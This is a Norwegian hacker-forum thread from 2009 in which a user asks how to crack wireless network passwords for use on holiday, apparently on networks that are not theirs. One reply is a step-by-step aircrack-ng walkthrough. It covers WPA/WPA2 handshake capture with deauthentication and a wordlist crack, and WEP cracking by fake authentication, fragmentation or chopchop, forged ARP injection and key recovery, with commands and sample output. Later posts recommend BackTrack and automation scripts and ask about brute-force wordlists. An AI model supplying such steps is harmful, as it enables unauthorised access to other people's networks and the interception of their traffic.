Du må være registrert og logget inn for å kunne legge ut innlegg på freak.no
X
LOGG INN
... eller du kan registrere deg nå
Dette nettstedet er avhengig av annonseinntekter for å holde driften og videre utvikling igang. Vi liker ikke reklame heller, men alternativene er ikke mange. Vær snill å vurder å slå av annonseblokkering, eller å abonnere på en reklamefri utgave av nettstedet.
  11 1783
Hei

Titelen sier vel det meste. Jeg tenkte det kunne hvert kjekt å kunne dette til jeg skal på ferie. Har gått igjennom MANGE guider/tutorials men jeg skjønner fortsatt ingenting. Så lurer på om noen kunne gitt meg en grundig guide/tutorial som har funket for dem

Taker for svar
Med utgangspunkt i nettverkskoret ditt støtter injectionmode.

ath0, wifi0 og alt det der kan varigere fra pc til pc (driver til driver)

WPA/WPA2 - PSK (PreSharedKey)
1.
airmon-ng stop ath0
iwconfig to confirme you have stopped all other athX interfaces as well

airmon-ng start wifi0
iwconfig to confirme ath0 is runnning in monitor mode
copy your MAC ADDRESS

2.
airodump-ng -c X --bssid AP:MAC:ADD:RE:SS -w psk ath0
channel to run on write to file "psk"

[ch X] [elapsed 4s] [Date, Time] [WPA handshake: AP:MAC:ADD:RE:SS]
----------------------------
Bssid PWR RXQ Beacons #data etc etc etc

3. Optional (active/none active)
aireplay-ng -0 1 -a AP:MAC:ADD:RE:SS -c Cl:IE:NT::MAC ath0
-0 deauth, 1 number of times

Might wanna check TCPDUMP for ACK packets, if none, GOTO 3

4.
aircrack-ng -w password.lst -b AP:MAC:ADD:RE:SS psk*.cap
word/password-list filename

output:
No valid WPA handshake (goto 3)
/
choosing first network as target
------------------------------
------------------------------
airmon-ng stop wifi0
airmon'ng start ath0
---------
ifconfig xxx down
ifconfig xxx up
iwconfig xxx mode managed
---------
wlanconfig ath0 destroy
ifconfig wifi0 down
ifconfig ath0 down
wlanconfig ath0 create wlandev wifi0 wlanmode managed
ifconfig ath0 up
ifconfig wifi0 up

WEP WITHOUT CLIENT

1. Start in monitor mode
airmon-ng stop ath0
airmon-ng start wifi0

2. Fake authentication
aireplay-ng -1 0 -e essid (networkname) -a AP:MAC:ADD:RE:SS -h MY:MAC ath0
OR (for tricky AP)
aireplay-ng -1 6000 -o 1 -q 10 -e essid (network name) -a AP:MAC -h MY:MAC ath0

3. chopchop or fragmenation to obtain PRGA
fragmentation:
aireplay-ng -5 -b AP:MAC:ADD:RE:SS -h MY:MAC ath0
output:
Waiting for data packet...
read 127 packets...
Size: 114, FromDSS: 1, ToDS: 0 (WEP)
BSSID = AP:MAC then use packet!
output:
Saving chosen packet in replay~~~~.cap
Data pcket found
Sending fragmented pacet
got REPLAYED packet!!
Saving keystream in fragment~~~~.xor
chopchop:
aireplay-ng -4 -h MY:MAC -b AP:MAC ath0
output:
Same thing, if BSSID = AP:MAC use packet!
output:
offset 84 (1% done) | xor = HEX | PT = HEX | x frames in x ms
Saving plaintext in replay~~~~.cap
Saving keystream in replay~~~~.xor
To reuse halvdone packet:
aireplay-ng -4 ath0 -h MY:MAC -r replay~~~~.cap

4. Packetforge-ng to create arp packet from PRGA
packetforge-ng -0 -a AP:MAC -h MY:MAC -k 255.255.255.255 -l 255.255.255.255 -y fragment~~~~.xor -w random-name
output:
wrote packet to random-name

5. start airodump-ng
airodump-ng -c X --bssid AP:MAC -w filename ath0

6. Inject arp-request (random-name)
aireplay-ng -2 -r random-name ath0
YES! use thing packet!

7. Run aircrack-ng
aircrack-ng -b AP:MAC capture*.cap

------------------------------
------------------------------
airmon-ng stop wifi0
airmon'ng start ath0
---------
ifconfig xxx down
ifconfig xxx up
iwconfig xxx mode managed
---------
wlanconfig ath0 destroy
ifconfig wifi0 down
ifconfig ath0 down
wlanconfig ath0 create wlandev wifi0 wlanmode managed
ifconfig ath0 up
ifconfig wifi0 up


WEP MED KLIENTER
punkt 2,3,4 kan droppes om du har klienter logget på. sånn ca ihverfall..mulig det er litte grann anderledes da.
Denne har jeg brukt laaang tid på å redigere, så håper den funker
jeg har desverre bare fått testet WEP WITHOUT CLIENTS, så vet ikke hvor bra WPA tutorialen er!

God ferie!
bruk ws.tcl istedet, så slipper du å skrive så mye når du skal knekke wep nøkler.

wpa/wpa2 er bare bortkastet tid å prøve seg på, du vil uansett aldri finne passordet med mindre du har det i en ordliste
Sitat av kim Vis innlegg
bruk ws.tcl istedet, så slipper du å skrive så mye når du skal knekke wep nøkler.

wpa/wpa2 er bare bortkastet tid å prøve seg på, du vil uansett aldri finne passordet med mindre du har det i en ordliste
Vis hele sitatet...
Kan se ut som dette er et godt alternativ hvis du ikke forstår noe etter å lest alle guidene.
her er en link:
http://tinyshell.be/aircrackng/forum...a&topic=3734.0

men det står ikke noe guide på hvordan du får det til å funke da.. så du må ha litt linux-kunnskaper

Forresten, velkommen til nFF!
Sist endret av Meteor Freak; 18. mars 2009 kl. 13:58.
Trådstarter
3 0
Den guiden du ga meg. Hvilket program skal jeg bruke der? Kunne du gitt meg en link?
Regner med at du bruker linux???
Hvis du ikke gjør det kan du laste ned en linux-versjon (som jeg brukte da jeg skrev den guiden). Den kan du putte inn på en minnepenn, kjøre et enkelt script. og WOLLA! du har hele operativsystemet på minnepennen.
http://www.remote-exploit.org/backtrack_download.html
Last ned BackTrack 3 USB VERSJON
Så booter du pc-en fra minnepennen. Da starter operativsystemet
Og derfra (etter du har åpnet terminal (svart boks)) kan du følge teksten der til punkt og prikke!
Lykke til!
Trådstarter
3 0
Sitat av Meteor Freak Vis innlegg
Regner med at du bruker linux???
Hvis du ikke gjør det kan du laste ned en linux-versjon (som jeg brukte da jeg skrev den guiden). Den kan du putte inn på en minnepenn, kjøre et enkelt script. og WOLLA! du har hele operativsystemet på minnepennen.
http://www.remote-exploit.org/backtrack_download.html
Last ned BackTrack 3 USB VERSJON
Så booter du pc-en fra minnepennen. Da starter operativsystemet
Og derfra (etter du har åpnet terminal (svart boks)) kan du følge teksten der til punkt og prikke!
Lykke til!
Vis hele sitatet...
Okei, men enda ett lite problem.... minnepinnen min har en størrelse på 256 MB. Så tviler på at jeg får lagt inn et helt OS på minnepinnen. (By the way. Linken funka ikke)
@Baby
Da får du kjøpe deg en minnepen for 100kr på biltema (eller gi opp, virker nesten preferable)

OT: Hvor lang tid vil det ta, med en 3ghz single-core processor med 1GB ram (brukt som eksempel) å kjøre igjennom en ordliste som inneholder alle bokstaver og tall (ikke symboler) opptil 6sifre?
Jeg prøvde meg på å lage en bruteforced ordliste med JTR, men filen ble raskt et par giga og ofc døde aircrack.
sier bare omnipeek funker driver der i windows , så kan du bare kjøre opp aircrack for windows og velge atheros.
du kan ikke sample data like fort men det funker veldig greit uten mye linux styr og boot for vær gang-.

NB: se guiden min om det for og forklare alt sammen. (søk på forumet)
intel(R) Wireless WiFi Link 4965AGN.

Vil dette kortet funke til å gjøre det som står i guiden oppe?
Vet ikke hva det støtter og sånn liksom.
Lå dette her siden det omhandler nesten det samme som han i posten spør om
Sitat av pusur333 Vis innlegg
intel(R) Wireless WiFi Link 4965AGN.

Vil dette kortet funke til å gjøre det som står i guiden oppe?
Vet ikke hva det støtter og sånn liksom.
Lå dette her siden det omhandler nesten det samme som han i posten spør om
Vis hele sitatet...
Den funker ikke i windows, men i linux (linken) ja

man kan sjekke om nettverkskortet er støttet på denne siden:
http://aircrack-ng.org/doku.php?id=c...8a70958735ac9e
http://www.wildpackets.com/support/downloads/drivers her er alle korta som har windows support.